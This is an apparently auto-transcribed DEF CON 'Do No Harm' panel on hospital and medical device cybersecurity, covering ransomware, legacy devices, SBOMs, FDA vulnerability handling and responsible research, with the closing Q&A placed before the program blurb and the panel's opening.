Yeah, and so one of the things I also wanted to kind of shed light on the scale of the problem, and so giving people an idea of in just what we think of as a pretty medium normal size hospital, you may have around 6,000 unique makes and models of medical devices, digital medical devices on that hospital's network. So when you start to talk about the maintaining of cybersecurity of those medical devices, that is 6,000 unique makes and models that update patches in different ways that you have to keep track of if they're patched. I can tell you from working with hospitals, the number that have a grasp on what medical devices are even on their network is just so tiny. That is such a huge struggle in the space right now, is hospitals, they don't know what medical devices they have, they don't know what's on their network from a medical device perspective. The ones that are more mature that I've worked with, that have gone through that exercise, what they've found was the medical devices actually represented about 15 to 20% of the endpoints on the hospital's network. And so that's a really big percentage of endpoints that you think of all those other hospitals that don't have those maps that don't know what those 15 to 20% of those endpoints are on their hospital networks. That's pretty scary. And so the scale of the problem is huge. We don't know what's on the networks. There's such a unique amount of just makes and models that even if you do have a grasp on it, keeping those things up to date with the patches, just full time job for dozens of people. And to Bo's point, they don't have full time dozens of people just to run around and patch medical device cybersecurity. And the other piece of it is just the legacy issue, right? Medical devices are actually designed really well, so for a medical device to perform its clinical function for 15, 20 years is not uncommon, right? But we all know there's just literally no digital components we could have put in that that 15 or 20 years later is still secure. And you can't keep patching it, right? At some point it can't run the latest and greatest of anything. So you have a lot of these hospitals really struggling with this problem of they have these legacy medical devices that still perform their clinical function, but they represent a really high cybersecurity risk to their network. So how do they decide to let go of something that's still working, right? Medical devices are not cheap. And when you think of, again, a medium-sized hospital, right, one of the ones I worked with had about 1200 infusion pumps, right? That's not even that big of a hospital, 1200 infusion pumps. You go to replace that, that is millions of dollars to replace devices that are actually performing their clinical function just fine. So where do you find the budget to do that when those devices are working, right? What is that bar of cybersecurity risk where you have to make that decision to end of life, that medical device? And a lot of hospitals are really struggling with that right now. Yeah. And I just want to take that problem, combine it with the problem that Josh mentioned on the video where we may have actual degradations of patient care here and turn the thinking a little bit from going from admiring the problem to understanding how this might be an opportunity to actually do something about it. And I think one of the things that is very exciting for me, bad jokes on my side, or having people who are knowledgeable about these issues from the hacker community in a position to where they can actually influence and direct policy at a number of really awesome agencies that are doing some incredible work. And Christian's not going to say this, so I will, but he's doing an operational role. He's a medical director of security at a hospital. So there are hospitals who don't look at this as something that they don't want to address, but actively invite and engage people to help them solve it. I mean, there may be a situation in the future and we can talk about the potential policy aspects here where, you know, there's a recovery and a stimulus and maybe this is something that we should address and put resources towards to help these hospitals that don't have them. I mean, I commonly think about this as a problem analogous to clinical medical disease, right? It's much easier to prevent a problem or to manage it chronically before it becomes an acute issue spiraling out of control. And so I think figuring out ways for us to turn towards those types of solutions is really interesting in this particular moment. All right, we're going to play a little game. All right, raise your hand if you think that if a hospital loses your medical records, they should be fined a lot of money. That's okay. All right, keep, all right. Keep your hands up if you think that that's going to make healthcare cheaper for you. All right, keep your hand up if you think healthcare is cheap. Tell me if you think it's going to get cheaper in the next 20 years. We have a, oh, I hope so. I really hope so. And maybe so. I need to talk to you because you have the solution and I don't know what to do. So we get these hospitals, we've talked about how hard the problem is, how they don't have the people to help them, how they're up to their necks in vulnerable legacy medical devices and infrastructure that's very fragile. They get owned and they have a big breach and they have to pay millions of dollars in fines. And then it's going to probably increase healthcare costs across, and Bo talked about the tradeoffs that hospitals have to make if they pay a big fine, how much money are they going to have left over to fix the freaking volums that got owned to start, right? It's a really hard problem, but we have to hold people accountable and organizations accountable for this. And we're in a really hard spot. You know, there are cyber, I'm sorry, I'll drink a whole case of Red Bull later. I'm freaking sorry about this. All right, but there are cyber haves and have nots in healthcare. There are hospitals that have marble floors and palm trees in the waiting room, right? Those exist and they're doing a lot better. And then there are rural hospitals and critical access hospitals that bleed millions of dollars every year and the only ones taking care of patients for 500 miles. And if that hospital didn't exist, people would die. They're the ones with shared credentials, still running Windows 7. They're the ones that can't afford new infusion pumps, and we want to find them a lot. So I'm not saying let's pity these hospitals, but we got to figure out, well, how do we fix this problem? And I want to just have a hand up. Would you as a taxpayer be willing to pay to have healthcare more secure? Raise your hand. Would you be willing to spend taxpayer? Oh my, take, don't take a picture because it's against the rules, but this is, this is the sentiment, right? It's a shared thing. The pandemic has reminded us that we all share this ecosystem of healthcare. It's really fragile and it's unacceptable that it maintains in this state. And what we really need to do is raise the entire ecosystem's security resilience. I'm going to just quickly say, I worked in the ER on a Monday. And if you work in the ER, you know that Monday is the worst day to work. They're always the busiest. I was on a Monday and the waiting room was blowing up. Wait times were skyrocketing. Patients were staying in the hospital for two or three days. In the emergency department, sometimes two or three days waiting for beds upstairs. What happened? It wasn't even us that got hit with ransomware. It was a hospital system in the same town as us, right? It's an ecosystem of care. And that if we don't build up the resilience of the entire ecosystem, guess what's going to happen to the ambulance transport time if you have a stroke or a heart attack and you have to go and bypass those five of our hospitals that are on diversion because they got hit with ransomware. Guess what? Your time is going to be longer. And that's not going to do well for your heart or for your brain. Maybe the difference between whether or not you walk or talk or eat or live or need to have a pacemaker implanted in your body. Sorry for the rant. I wanted to, oh, anyway, reflections of that before I move on to a less depressing topic. No. No. Raise your hand if you're familiar with software build materials. Anyone? All right, Rad. I'm going to quit talking because there's this thought about software build materials as a potential mechanism to reduce vulnerabilities or at least identify vulnerabilities and patch them sooner. I'm going to open it up to the panel here. Briefly talk about S-bomb and then as well as whether or not it's going to fix all these problems. Is this the magic, secret sauce? Yeah. So I'll start this. So for those who said you're familiar with the S-bomb, one of the things everyone in the room might not realize is that I actually credit healthcare and medical device space with being one of the first industries to actually really rally around this concept. So the NTIA working group that was really building the foundation of what is now becoming a NIST standard based on the NTIA working group work, that was actually very heavily run by the healthcare industry. And so the healthcare industry has had several years of working on S-bombs. If you look at that draft pre-market guidance that I mentioned that the FDA put out about two years ago, you'll actually see that that was one of the requirements inside it. They called it a C-bomb at the time. They're updating it to be called an S-bomb to align with industry terminology. But this whole concept of an S-bomb is really polarizing. It's very interesting to talk to people who are just immediately against this thinking like, oh my God, we're just giving a roadmap to all the attackers. And I'm one of the people on the side of the fence that actually says this is actually a really good thing, right? The attackers are going to figure out the roadmap. They're going to figure out what's in your device anyway. Instead, let's enable the good guys to actually have that list of ingredients that's inside of our devices. And so for anyone following on the policy side, earlier in May, there was an executive order that came out here in the United States around sort of this supply chain transparency. And one of the things hidden inside of that was around S-bomb. And so that's why you start to see that initial NTIA working group around the S-bomb is actually now getting translated into a NIST standard. And so so much more of a spotlight has been brought onto this topic of an S-bomb. And since that May executive order. But the healthcare space has actually been really working on this for a number of years. And some of the initial like formats around CycleMDX, I'm trying to think of the other two. I'm totally blanking on the other two formats. But a lot of the work around getting S-bombs to actually be operationalized is getting around consistent formatting and consistent nomenclature. And so the healthcare space has been working on that for several years trying to actually figure out, you know, how do we one generate S-bombs in a consistent manner? And then how do you get use out of them, right? So we've had a lot of hospitals who are actually trying to use S-bombs in their struggle on both sides of it. And so I would encourage anyone who's interested, the NTIA working group actually put out a report around how we tried to use S-bombs in the medical device space, how hospitals tried to leverage them in a lot of the struggles basically that are still in the works of trying to tackle. Like how do we make this really impactful in the healthcare space? And to Bo's point earlier, anyone in this audience who is interested in that topic, absolutely get involved. Those working groups are open. You can reach out and join any of them. We absolutely need as many security people as we can working on these topics. Any of the guidance around cybersecurity for medical devices, I would encourage anyone in this audience to join them. We need those guidances. I will say I have sat on a number of those working groups around any kind of regulation, guidance document, technical frameworks that come out for the medical device security space. And they're so influential in the space, but I can tell you a lot of the working groups really lack subject matter expertise. There's a lot of people who write standards as their day job. And I love them, got to have people who love writing standards. But what we're lacking in a lot of those working groups is the security expertise. And it's not sexy work. You will sit on phone calls where you listen to people argue about where commas should be for literal hours. Not joking. And it is incredibly painful, but at the end of the day when those regulations come out, they need cybersecurity expertise to make sure that those are actually impactful. So same things with those working groups. That NTIA, we need more security people. So anyone in this audience, if you want to make an impact, one of the biggest ways you can do it, if you're not willing to sort of change jobs and change your salary, join those working groups. Be a subject matter expertise on any med device security working group. If you're not sure which ones to join, absolutely reach out to me. I can send you a list of stuff, but please be on those working groups and lend your security voice. For those who aren't familiar with S-bombs, off the bill of materials, the idea is gross oversimplification. But it's like an ingredients list on your food, right? What's in the thing that you're using? And Dr. Marie Moe, who is herself a pacemaker patient, sometimes says that she can know the ingredients that go into the candy bar she's eating, but she can't know the ingredients that go into the pacemaker that keep her alive. And in another very oversimplified example, if you look at two extremes, and, you know, soft rubble of materials is not either of these extremes, but two extremes. One where manufacturers have no idea what goes into the products that they make and sell you, and one where they have full visibility into what goes into the products that they make and sell you. Which one would you rather be at? Anybody want manufacturers to not have no idea? Where's your hand? Christian does. He's in that camp. That's cool. But in some of the last few years when hospitals have started asking medical device makers to provide a software bill of materials, it caused those medical device makers to have to figure out what's actually in their software, what's in their hardware. And they said when they looked into it, it scared the hell out of them. And they issued updates not because there was a new vulnerability announced, but because they found out that they were very old vulnerabilities that were causing undue risk. So the act of asking to reveal what's in your software, what's in your hardware can has the catalytic reaction, even if, to your point, even if the hospitals themselves don't know how to use it, the act of asking can create that. And in financial services organizations, they've been doing this for a while. One of the people who participated in some of the NTIA conversations said that they were at a large bank and they asked for a software bill of materials. And if the manufacturer of that software couldn't tell them what's in their software, then they asked them for a 20% discount because they knew that they were going to have to layer on extra security on top of whatever they bought because they couldn't account for what was actually there. So there's many, many uses for a software bill of materials, whether you keep that internal to the organization that's developing the software or whether that's something that's requested and passed on through the supply chain. Just to add on to that a little bit, I mean, as someone who's sat on a pharmacological review board as well as a recombinant DNA review board, we analyze every single ingredient that goes into every single pharmaceutical that is out there. It's tested over and over again. We know exactly where it came from. You know, what modifications it has, things like that. Why wouldn't we want to know what configurable pieces go into medical devices? All right. So if you've ever been to Do No Harm before, you kind of know that we do this for a little bit. We're going to take a couple audience questions for the full panel. And then what we're going to do is we're going to break up and each one of the panelists is going to go into a corner or so. You can congregate around them. We'll get to that in just a moment. I have one last question for the panel before we take open Q&A. And that's going to be, I'll first say, who here is invigorated or sorry, who here is depressed after watching this talk? Yeah, raise your hand. It's okay. Who here are you guys are already depressed? So you couldn't get any more depressed. Okay. Well, if you need antidepressants, Jeffrey at the end can write you a prescription for some. They take a while to kick in. So we encourage you to start now. How many of you are not depressed, but maybe like invigorated to like try to go and try to help this problem or try to contribute to make things better? Oh, that's amazing. That's my last question for the panel. Each of us could take an opportunity to say is the hackers in the audience, what can they do individually besides what we've already talked about, you know, take a pay cut and go work for a hospital, anything else that you and the audience could do to make this better, set on standards, et cetera. But anything else to take away before you open up the Q&A? I'll say talk to your own doctors and nurses and people you interact with as a patient and make sure that they're up to speed on some of these issues. They don't have to be experts, but make sure that they are aware of the fact that this is becoming something they should pay attention to. Yeah, and so I already mentioned the working groups, so absolutely the working groups. But beyond that, if you work as a vendor that is in the software security solution space, right, so maybe you guys make some widget that is supposed to help with cybersecurity, think about how that widget may help the healthcare space. There's a lot of general purpose sort of security widgets out there that they just don't work in the healthcare space. Either the medical devices are too resource limited, they have interesting operating systems, they cause too much of a delay on the system for things that have real-time signal processing. There's a lot of general purpose security widgets out there that literally just do not work in the medical device security space. So they're also very limited in some of the solutions that they can just generally adopt. So if you worked at one of these tool vendors, maybe bring up the fact that like, hey, what do we do about the medical device space? Is there something we could pivot our software product to do? And then of course, obviously just go work for a medical device manufacturer or a healthcare organization. I don't know a single one that does not have open job rex right now for security people. I mean, it's kind of a conglomeration of the previous ones, but ask a lot of questions. You know, question everything, do your research, visit the villages that are, you know, messing around with your medical devices and your infrastructure and just be that kind of force that can continue to be an advocate for this kind of thing. Yeah. There's a lot of good things that have already been said. I'll say something that's slightly different, which is states actually hold a lot of power over healthcare. States, in a lot of cases, is a regulator of hospitals and others. So a lot of time there's a big focus on federal legislature, on federal public policy, but states also do a lot of public policy. And a lot of times they don't get the help and support from the organizations that tend to frequent DC. So wherever you live, you have a state government unless you live outside of the United States, in which case you have another type of local government. And oftentimes, you know, you can just call up whoever your local representative is and say, hey, I have a certain skill set. I'd like to offer it to you. Do you have anything that's going on? Or, you know, ask them for a briefing. You'll get 15 minutes and you can go talk about healthcare security and some of the consequences and some of the other things. And just having those conversations sometimes will lead to them taking some action. Maybe it's writing a letter. Something as simple as writing a letter, even from a state legislator, can make a big difference in nudging hospital administrators or medical device makers or doctor boards or others into a situation where they actually consider security as a part of whatever they're working on, whatever they're doing. Awesome. I just got one thing to say. I think one of the most important things that happened in this space in the last, you know, 10, 11 years was that hackers out there went out and got medical devices and started poking at them and started finding what was wrong with them and brought that to our attention, whether or not it be Kevin Foo's group talking about pacemaker AICDs or Barnaby Jack before he died talking about that or Jay Radcliffe's infusion pump or Dr. Marie Moe, you know, reverse engineering some crypto on her own pacemaker. These are the types of things that hackers do really well and we need more of that. We need more of you out there doing some device research. It's, believe it or not, pretty easy to get a medical device. Depending on the medical device, you'd be kind of shocked somehow how easy it is. Poke, prod, bring your research to a place like DEF CON. Teach others around you because that action, those hackers that went and did that research and brought everyone's attention, they really freaking moved mountains, I'll tell you. Right? The FDA did great things in response to the research, had their backs as security researchers and as long as you do it in a safe and responsible way, using things like coordinate vulnerability disclosure, being responsible about that, knowing that these vulnerabilities can really impact human life, doing that type of research and hacking on things like we do can really make a big difference. And so I would encourage you out there to do it and to do it right and to be responsible with it, but that can help us really change a lot of minds. Oh yeah. So to add one thing to that, I mentioned I used to work at the FDA, I worked there for a year on a one-year program. They really want to hear from you. In 2012, 2013, 2010, when some of the initial hackers were doing their research on medical devices, security wasn't as prominent on their radar. Today, they're all bought in. I mean, come on, they hired me to come in and help them. They actively recruit, they're not here this year of course, but in the past several years, they've been out at the biohacking village going to talk to hackers, going to talk to medical device makers, making sure that medical device makers know that they expect a certain level. And in fact, one of the things that we pioneered was a website called We Hard Hackers, we are at hackers.org, where the FDA, the director of the FDA came out and said, we want more medical device makers to put their devices in the hands of hackers so that they can find the bugs before they become harmful. And so if you're researching medical devices, if you have done your diligence to report to a medical device maker, the next step should not be public disclosure. It should be coordination, if not with the medical device maker with the FDA, they want to hear from you. And they can pull levers that you can't. They have an amazing suite of capabilities that they can use to figure out what the right thing is, not for the medical device maker, not for your ability to drop O-Day at Black Hat, but for patients. And that's what this is really about. It's about patients, it's about healthcare, it's about those vulnerable people who really need us. So I just wanted to add that. Awesome. All right. Well, we're going to take some questions for the full panel. I'm going to ask you the following. If you could come up a little bit closer to the stage, please do not spew COVID on anybody. I ask a question, I'll repeat it. There might be some questions that are off limits, but I don't really think that's probably going to be a problem here. And then if you want to save your question to an individual panel member, after we take a few questions, we're going to break up. And then again, I'm going to remind everybody, respect people's COVID precautions, don't get too close, wear your mask, especially with our panelists as they're around and the people around you, because we're a community of hackers, we're a family. Last thing we want to do is hurt each other. Okay? Any questions? Okay. Okay. Yeah. So the question was, how do you get software and I'm assuming hardware vendors who come sell a product and leave and never give support or how do you address that issue? Because it's a really huge one. Does that make sense? Did I encapsulate that well? I think it was acquisition. Yeah. Medical device makers that get sold to other medical device makers too, right? So how to deal with shitty vendors? Yeah. So I guess I'll rephrase it not from shitty, but vendors who are not very clear about communicating end of support. So one of the things that several manufacturers are trying to do is make it very clear, kind of like Windows, right? When Microsoft releases Windows, they tell you the second that comes out when you're going to stop getting support for that operating system. So you can make a decision on what you're going to do with that operating system because you know when support's going to end. Manufacturers are still very early in that maturity of announcing how long are you going to support this medical device that I'm selling to you. So you do have instances of manufacturers continuing to sell medical devices and you just, you literally have no idea when they're going to end support or end of life that from a security update perspective. So there are some manufacturers who are working on this concept of this end of support, end of cybersecurity support, that when you buy that device, you know, but I would say right now that's still in its kind of infancy of its maturity cycle. So it is, the big ones are aware that that is an issue. They have not solved it yet. You mentioned it earlier, the FDA's post-market guidance. The FDA actually set up something new with medical devices so that security issues can trigger recalls. At the same time, they gave a carrot to manufacturers. They said if you meet certain thresholds, you don't have to do a recall. A recall in healthcare is a big deal. So if you know about security vulnerabilities in a product, you can report that to the medical device maker. Again, if they don't do anything about it, you can talk to the FDA. As long as those devices are out there, that manufacturer has a responsibility to monitor safety, potential safety issues. And that's what cybersecurity issues are, according to the FDA. So there's a hook there that you can use to get at least awareness and attention. And when one of the researchers, Billy Rios, looked into security of some infusion pumps, even though the manufacturer no longer sold the pumps, they were required to issue an update or try and pull them off the market. And so that's what they ended up doing. And that manufacturer actually changed a lot of what they did. And they became, I think it was them that they became the first manufacturer that went through the UL certification for security. They've been at the DEF CON biohacking village device lab every year that we've had it. So the act of causing them to have to pay attention to security changed a lot of the way that they did business. So I would say use those mechanisms that already exist to go through those types of channels that they pay attention to already. Is there any data related to other countries with very different, top-tier delivery environments in the U.S., like the North and South of the States, those incentive structures have led to better outcomes in the space, whether it's more secure devices, like the calls from organizations that are more effective at controlling them, or is there any comparison to that? Thank you for the excellent question. If I could kind of distill the question down at the heart of it is, do we have data to be able to measure or do we have data to compare certain interventions, right, potentially between countries, for example, have different types of health care systems? Do we have very basic measurements of whether or not things work and whether outcomes are better if there are more secure health environment, for example? Okay. I'm going to take the stab at this because this is a little bit of a passion of mine. It is amazing to me how little data we have, right? When you drive a car or when you go and do something of importance, when they make a product, they collect a lot of data, and they make decisions off that data because it matters. In healthcare cybersecurity, again, I swear I'll drink a whole case of Red Bull for you guys. I'll give myself heart palpitations. We have no data. I would love to be able to do a study that compares, you know, take country A that has a nationalized health system and is quite secure, for example, comparatively to a lot of hospitals that are in the United States, and let's take a measurement of their heart attack victims and say who has better outcomes, or who's more resilient to ransomware, or what type of interventions in a hospital or mitigation, security control mitigations in a hospital actually result in less ransomware attacks. We don't have any of that data. We don't have the sophistication to even begin to ask those questions. We have to build the whole infrastructure. We have to get people to believe this is an actual issue. We have to put in place the sensors and epidemiology to collect that data, then analyze that data. We've got to train researchers to do this. And what I'm trying to say is, unfortunately, it's a dismal thing to even think about. All we have right now are anecdotes. We don't even have evidence. We have stories. And Jeff mentioned, or not Jeff, Josh mentioned on the video that we are now starting to collect that data in some cases and publish it. I do think in a silver line to this, right now we don't have the data. I think 2021, 2022 is going to be a banner year for this. I think we're going to finally get some published peer reviewed data out there that says that ransomware attacks hurt people, not just their protected health information, but their actual lives. And that, I hope, is a catalyst for positive change moving forward. I hope it encourages a lot of other people to want to study this more regularly, because that's what we're going to need if we're really going to, you know, move the needle on this. Sorry, anyone else? I'll build a little bit on that. While we don't have data, we do have some empirical evidence. One of the things that several of us do is we run an event called the CyberMed Summit. And the CyberMed Summit, one of the really cool parts of it, and one of the things that I think has been eye-opening for a lot of people, is these clinical simulations. So just like pilots go into a flight simulator, so the first time they land in 30-knot crosswinds and fog is not the first time they've ever experienced that. They experience it in a controlled setting. Doctors do the same thing. And what these two geniuses on the end did is they created clinical simulations that replicate what they do. They did that replicate what would happen if there's a security issue with a medical device, whether it's, you know, ransomware of a lab system, whether it's a pacemaker that's been hacked, whether it's an insulin pump that's been hacked. And based on the evidence that you can gather from how doctors actually go through in this simulated environment, in this controlled environment, we actually know a lot about what would happen. And not just what would happen with the patient, but what happens next. Do the doctors say, I think that device got hacked, or do they just send it down to Biomed to see if it can be updated or, you know, reset? Do they blame the clinicians who are in the room with them for, you know, setting the wrong drip rate on the IV, or do they say, I want this investigated and we need to do a root cause analysis on what caused this? And I think what we found is that the awareness among physicians is not necessarily there. The awareness among health centers is not necessarily there. Even when it is there, you may not have the data on the device. You may not have logs. So you may not be able to tell what happened. Even if you have the data, the Biomed people might not be able to read it because it might be in a format they don't understand or in a way that they can't get it off. If they want to send it to the manufacturer, the first thing the manufacturer does is says, wipe all the data. We don't want any patient data on it. So, you know, it's hard to get the evidence, but I think Christian's right. I think that 2021 is going to be a year where we see a drive towards acquiring, reviewing, analyzing, publishing data, statistical information, and the types of things that we need to change doctors' minds because they are scientifically driven. And if it's not in a peer-reviewed journal, it's for them just anecdotes. That's great because they build off education. They build off knowledge over years to do something that is statistically relevant, but it also slows down our ability to change health care. I'm just going to let the next person know. Can you repeat the question? He actually works at a hospital and so they had an incident where a machine actually did get, like, a conficker, which is, you know, we should be resilient to that at this point. And, yeah, of course, their solution was we'll take it offline, turn it off, like, well, you can't, the PAC system serves a very critical role inside of a hospital system. It has to literally be on the network where it serves no purpose. And so his question was, like, how do we fix this, right? So one of the most powerful things I've seen is the hospitals actually literally using cybersecurity in a purchase decision and literally saying no when it doesn't meet their cybersecurity bar. And so, you know, the FDA and the regulatory bodies, you know, they're raising the bar, but at the end of the day if a manufacturer can't sell to you as a hospital, that keeps them up at night. But I also will say a lot of manufacturers are doing better. But the biggest lever you can pull as a hospital is at purchase time. Make sure cybersecurity is part of that purchase decision and if it doesn't meet your cybersecurity bar, then you have to be willing to not buy that device. And this is a hospital system that cares more about a bar than hospitals. So, yeah, I think that's the case. Well, and it's hard, like what I'm saying, like, it sounds easy and principle, it's not, right? And at the end of the day if the device provides a clinical function that is better than all of the competitors and it's securities worse, at the end of the day you know what, patients come first and you have to sell by that device. But there's a lot of competitive devices out there. So if there's another device that serves the same clinical function with like similar efficacy by the one with better security. I take it you guys don't guys and gals don't really like vendors. Is that, is that a common thing? But see, this is how you have to help vendors go work like go work with them, right? So I've consulted with them for years, like they actually want to do the right thing. They do not have the resources to do the right thing. All right, we're going to go ahead and say I'm sorry, please, we're hanging out here. We're going to get you the right questions, the right people, but I think it's important for us to break up. It wouldn't be a do no harm if you couldn't come face to face with a panelist and ask like hard questions. So, all right, again, to reiterate, find whatever speaker on the panelist you want in a corner, ask them a question, mass and distance and move around. If you see someone that's particularly swamped, maybe go to the other and then come back. It's going to be a little bit of a give and take. Thank you again, DEF CON for this. Please give yourselves a round of applause. All right, come talk to us. Yeah, and I was just going to apologize. I actually have to run, but if you have questions, I love talking about this topic. Find me on LinkedIn, Stephanie Domas, you can find my name in the program. But if you have questions for me, I would love to answer them, but reach out to me online. Sorry.
|
Mired in the hell of a global pandemic, hospital capacity stressed to its limit, doctors and nurses overworked and exhausted... surely the baddies would cut us a little slack and leave little 'ol healthcare alone for a bit, right? Well, raise your hand if you saw this one coming. Another year of rampaging ransomware, of pwned patient care- only this time backdropped by the raging dumpster fire that is COVID. Can we once and for all dispel with the Pollyannas telling us that nobody would knowingly seek to harm patients? And if we can't convince the powers that be- whether in the hospital C-suite or in DC- that we need to take this $%& seriously now, then what hope do we have for pushing patient safety to the forefront when things return to some semblance of normal? With a heavily curated panel including policy badasses, elite hackers, and seasoned clinicians - D0 N0 H4RM remains the preeminent forum where insight from experts collide with the ingenuity and imagination of the DEF CON grassroots to inspire activism and collaboration stretching far beyond closing ceremonies. Moderated by physician hackers quaddi and r3plicant, this perennially packed event always fills up fast - so make sure you join us. As always- the most important voice is yours.
|
10.5446/54198 (DOI)
|
Welcome, DefCon to the Do No Harm panel. If you're joining us for the first time, this is a panel looking at the complexities of the hacker community and healthcare. We're joined by an amazing panel of people who will introduce themselves shortly. But before I begin, I want to introduce our other moderator, Replicant. Hey guys, Replicant or Jeff here. Very happy and honored to be back with you today. For those of us who are joining asynchronously and watching this virtually, we hope you're doing well. We're starting to not see you in person, but understand that that's the best choice at this time. And look forward to DefCon where we can all get together in person, happy and healthy. My name is Jeff, as mentioned. I'm an anesthesiologist by training. And I work with QWADI doing some security research on the side down here at UC San Diego. A man who needs no introduction, but do us a favor. And for those who may not be aware of the glory, that is Josh Corman, give us a quick intro and a little bit about what you do. And then all of our subsequent panelists can also say hi. Sure. Well, I'm Josh Corman. I'm one of the founders of Eye in the Cavalry about eight years ago, August 1. And but very important to disclose right now because of some work I did on a congressional healthcare task force that ended in 2017. When the pandemic started, director Krebs at the time asked me to come serve the country for a year as part of the CARES Act. So I am the chief strategist for the pandemic response to the SISA COVID task force at SISA, the cybersecurity infrastructure security agency. So if you want to spot the Fed guilty as charged, at least for a temporary emergency hire. So I'm here in my official capacity. But if we touch upon things that happened before the pandemic, I may be wearing a different hat. Awesome. Gab, will you introduce yourself? Yes, I can do that. So I am a cloud security engineer currently working in healthcare, doing a lot in the insurance space and in the regulation space as well. I also do some medical device research and my background is actually in genetic science and neuroscience. So kind of had that crossover actually got into information security through medical devices. So this is a near and dear subject to me. Awesome. Stephanie. Hey, everyone. So I'm Stephanie Domas. I'm currently the director of strategic security and communications at Intel. And so I'm right now really focused on the critical role that hardware and firmware plays in the role of security. But more importantly to this conversation, as I spent about seven years previous to that focus specifically on medical device cybersecurity. So did a lot of consulting with medical device manufacturers, healthcare providers, really digging into the bits and bytes of how do you design and build and maintain more secure medical devices? Wonderful. And last but not least, Jessica. Sure. I am Jessica Wolterson. I'm a senior cyber policy. I'm a God advisor. We go back and forth between advisor and analyst at the FDA, the Food and Drug Administration. So my job is medical device cybersecurity pretty much all day, every day. But from the government angle, so I guess I am the other said in the room, forgive the awkward camera angle. I am technically on vacation right now, but you all are so important. I decided how to do this panel for you. We're going to take off the panel today with an understanding that there's a big elephant in the room, which is if this talk is about hacking healthcare and all the complexity of this, there's been a pretty serious issue going on for over a year, the elephant in the room being of course COVID. And we wanted to underscore that before we began just to discuss a couple of things. One, that there's some renewed urgency in the need to address the resiliency of healthcare. We've seen a lot of failures. We've been seeing them for a long time. Now with the pandemic as a backdrop, it's now more important than ever for us to really address this key issue, as well as to learn more about what we failed in, what we can do better, and how us as hackers can really contribute towards this mission of improving the safety of healthcare, not just in the United States, but all the way across the world. And then to open up the first question to the panel, we wanted to talk about hackers and the amazing research that they do into medical devices and critical hospital infrastructure. It seems like not a year goes by where we don't see some amazing research being done, hacking infusion pumps or insulin pumps, tax on HL7 and other types of healthcare-specific issues. And they tend to come out into the media. We've seen, my first question to the panel is, we haven't seen a lot of that this last year. Why? I'll take a stab. So I have been involved in witness to some coordinated vulnerability disclosures over the last year. Perhaps they're just not as public or revealed at conferences or perhaps they're happening a more collegial behind the scenes way with a little less sensationalism. But the vulnerabilities are certainly there and the talent pool is certainly there, but maybe others also figured there was a lot on the plates of medical industry at the moment and are exercising some discretion. But there's probably other reasons as well. Wonderful. Josh, your answer to my question, which was that we seem to be seeing some research is just not very public yet. I wanted to reach out to the rest of the panel, Stephanie, Jessica, Gab, your thoughts on what's going to happen here in the next year or so with the medical device research we really haven't been seeing over the pandemic. So I'll jump in. So building on what Josh said, there is activity happening. So I think part of the reason you're not seeing as many headlines around it is because of the maturity of those coordinated vulnerability disclosure processes, which is an excellent thing. But I think the other piece of it is also around the maturity of the media and knowledge in the space. So I think we're starting to reach a point where vulnerabilities being responsibly disclosed by manufacturers is business as usual. So instead of every time one of these disclosures got posted by medical device manufacturer instead of their bean sensational headlines around it, that's becoming business as usual. So there are still vulnerabilities getting posted. They're being released by medical device manufacturers, but they're not getting picked up in those sensationalist news cycles, which I think is a great testament to just the maturation in the industry. It's actually a good thing that these are being disclosed and it's not worth sort of the scare tactics that we had seen maybe earlier on in the space. Yeah. I would really echo that. I mean, as part, oh, God. Okay, good. I was actually unmuted. I thought I was going to have an issue, but I would echo that from the FDA space. I mean, this is my job. I do vulnerability response for medical devices. And so let me assure you there is no shortages of medical device vulnerabilities because if they did, I would have a much easier job than I do. But like Stephanie and like Josh are saying, the industry has really come a long way in terms of maturity and not just the industry, not just the researchers. The FDA has also matured of what we've seen and what we've gone through and what we've experienced. And so our response, I think also influences the way that a lot of these sometimes get reported. And I am actually very happy to report them in a lot of cases now. We'll get a vulnerability. We have the internal expertise within FDA to do our own analysis of patient safety risks. And then we just sort of give it to the teams. We give it to the reviewers to say, go forth and work with the medical device manufacturer and get the same fix and then they do it. And it's just like Stephanie said, it's just business as usual. You know, from the engineering perspective, I think additionally, there is being cold in so many directions right now. I think there's different things happening across the entire industry and not just in the healthcare space. So I know that like my team and the work that I do, we have just so many different projects involving different types of technology and different things across the industry. So it's been a little bit harder to try and focus on the medical devices specifically. Let me just kind of pull back things a little bit in general and say that at the last, you know, harm, which was all virtual on Discord, I think we were still kind of a little bit in the acute shock period of everything that was going on with respect to the pandemic. And now we are 18 months into this, we have really seen Christian clinically how much of an impact has had on how we currently practice medicine, how we're likely to do so in the future. I'm curious just to kind of set the stage for some of the questions we're running into later. What are some of the sort of lessons or changes in perspective that you have all had as a result of being able to kind of sit with this for a little bit longer and decompress. I don't work obviously no, we're close to being out of it, but now that we're a little bit removed from that acute crisis period, where have you sort of changed and how do you look at the space as a whole and the major pain points and problems that you're thinking about and what sort of surprised you about that entire process. I'm going to want to go last on this one. You said you do want to go last. Gav did you have something you wanted to say? It's interesting for FDA and coming out from the healthcare federal government angle. We all went on remote work I think in like March, but of course healthcare, you cannot work remote healthcare. I think Jeff and Christian you probably know that better than anybody. The patients still have to go to hospital, people still have to see doctors. All of these things still have to carry on. Healthcare is so incredibly highly digitized that we already knew that we had this reliance on digital technologies and Josh, I don't know what your over dependence on, you have this phrase that you use which you can repeat when you speak, but we knew we were dependent. That wasn't the secret. I think the extent to which we were dependent and the ease with which critical functionality can be disrupted on accident, on purpose for whatever reason, just really underscored the criticality of figuring out cybersecurity and healthcare to a significant degree than we have right now. We have come incredibly far from when Josh, you said I'm the capillary Stephanie when you were with MedSec and all of that, but we still have an incredible way to go and I think the pandemic was a little bit humbling in that sense of revealing that we had a lot of this work still ahead of us. At least for me just speaking about the trends I saw in the industry, for the first half of it I would say we were exponentially increasing our cyber risk in the healthcare space by just moving devices around, pop up clinics, standing up like beds in parking lots. The cybersecurity risk was growing exponentially yet from a consultant's perspective I can tell you that there was no spare cycles for tackling that risk at the time. There was a lot of technical debt taken very early on in the pandemic around cybersecurity because everyone's top functionality was just did it working. We just have to make it work. The last six months or so I would say is when I started to see that technical debt being cashed in, you're starting to see people get their heads above water in the healthcare space and try to now redeem that technical debt and get rid of it. It's been interesting seeing that cycle of now people are finally coming back up for air and trying to tackle the spaghetti monster that was made for very good reasons. Just an interesting observation. We're not out of the woods yet. The technical debt is still there but we are starting to chisel away at it. So I'll try to be brief on some of these things. I referred back to that. We had a congressional task force for healthcare and cybersecurity as part of the SIS of 2015 law. We started in 2016 and finished Mother's Day weekend 2017 when Wannacry affected 40% of the UK's healthcare delivery. So we 